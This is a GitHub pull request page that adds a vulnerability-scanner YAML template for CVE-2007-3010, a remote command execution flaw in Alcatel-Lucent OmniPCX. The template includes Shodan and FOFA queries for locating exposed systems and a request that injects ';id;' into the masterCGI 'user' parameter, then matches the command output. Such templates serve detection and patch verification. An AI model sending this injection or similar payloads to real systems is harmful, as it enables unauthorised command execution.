Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2007-3010 #8387

Merged
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
55 changes: 55 additions & 0 deletions http/cves/2007/CVE-2007-3010.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,55 @@
id: CVE-2007-3010

info:
name: Alcatel-Lucent OmniPCX - Remote Command Execution
author: king-alexander
severity: critical
description: |
The OmniPCX web interface has a script "masterCGI" with a remote command execution vulnerability via the "user" parameter.
impact: |
Any user with access to the web interface could execute arbitrary commands with the permissions of the webservers.
remediation: |
Update to supported versions that filter shell metacharacters in the "user" parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2007-3010
- https://marc.info/?l=full-disclosure&m=119002152126755&w=2
- http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php
- http://www.vupen.com/english/advisories/2007/3185
- http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10
cve-id: CVE-2007-3010
cwe-id: CWE-20
epss-score: 0.97264
epss-percentile: 0.99824
cpe: cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: alcatel-lucent
product: omnipcx
fofa-query: app="Alcatel_Lucent-OmniPCX-Enterprise"
shodan-query: title:"OmniPCX for Enterprise"
tags: cve,cve2007,kev,rce,alcatel

http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;"

matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"

- type: word
part: body
words:
- "<TITLE>master</TITLE>"

- type: status
status:
- 200
Loading